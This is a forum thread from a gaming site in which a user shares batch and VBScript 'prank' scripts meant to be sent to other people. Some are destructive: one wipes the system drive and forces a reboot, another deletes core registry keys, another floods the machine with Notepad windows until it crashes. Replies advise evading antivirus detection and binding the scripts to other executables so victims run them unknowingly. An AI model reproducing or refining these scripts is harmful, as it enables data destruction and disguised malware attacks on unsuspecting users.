Post: Great .vbs Codes! [Some Are Very Dangerous!]
09-20-2009, 12:16 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); These are some great .vbs that i found... Some of them are .bat

Warning some of these are Very Dangerous, Not my problem if you mess up your own computer or someone else's.

Thank You
-LordOfSpoon
-GaMeRrEmAg


The blue screen of Death
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again
    @echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


Stupidity Shutdown
*This pops up a funny message then will shutdown the computer
    @echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)
    @ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE


Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
    [codebox]@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top[/codebox]


Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
    [codebox]Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop[/codebox]


Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
    [codebox]Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop[/codebox]


Endless Backspace
*This makes it so the backspace key is constantly being pressed*

    [codebox]MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop[/codebox]


Popping CD Drives
*This will make the CD drives constantly pop out*
    [codebox]Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop[/codebox] ]


My Personal Favorite .BAT Code
Make Multiple Message Appear on screen
    :Begin 
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * since you are stuck reading
msg * I am gonna tell you a story
msg * bout a dumb guy named (victims name)
msg * who just opened my batch
msg * and got stuck listening to a story
msg * from a computer
msg * so he was opening up batches
msg * when one pops up with a cool msg
msg * then it says "hi"
msg * Hi
msg * Are you having fun?
msg * I am!
msg * have fun playing with this one (insert victim)
msg * Because you have been P-w-n-e-d with a capital "P"
GOTO BEGIN


Please +Rep if you think they are useful

Thanks Again....

The following 2 users say thank you to LordOfSpoon™ for this useful post:

Dewzy916, NanuGama
09-20-2009, 12:58 AM #2
iiBlazee
Bounty hunter
i think for the delete registry you gotta add some type of null command i think its <null or >null or somthing null but idr. Because when it does that it asks you are you sure and the null commands gets rid of that, you should try crypting it cuz most av compainies would detect it. Wait this is .vbs idk how to crypt that but its prolly very similar

The following user thanked iiBlazee for this useful post:

LordOfSpoon™
09-20-2009, 01:16 AM #3
ya some are .vbs not all them are
09-20-2009, 01:22 AM #4
ps3ia
Bounty hunter
Noob question how do u run them? just put them in a notepad and name it whatever.bat or whatever.vbs
09-20-2009, 01:56 AM #5
You guess it bro
09-20-2009, 02:05 AM #6
So you just save it then send it to someone else?
09-20-2009, 02:16 AM #7
Originally posted by TheDee1992 View Post
So you just save it then send it to someone else?


Yes, but you need to know how to bind it with a different .exe file that they will open it without thinking something is up.

here is some ways to bind them:
You must login or register to view this content.
09-20-2009, 10:13 AM #8
Registry One FTW!
09-20-2009, 10:27 AM #9
+Sfx Krush
Childish Gambino <3
wait how would u send these to ppl?
09-20-2009, 12:19 PM #10
Mighty Jebuz
Nerds √16 Ever!
nice! im assuming the last one is a .bat file

The following user thanked Mighty Jebuz for this useful post:

LordOfSpoon™

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo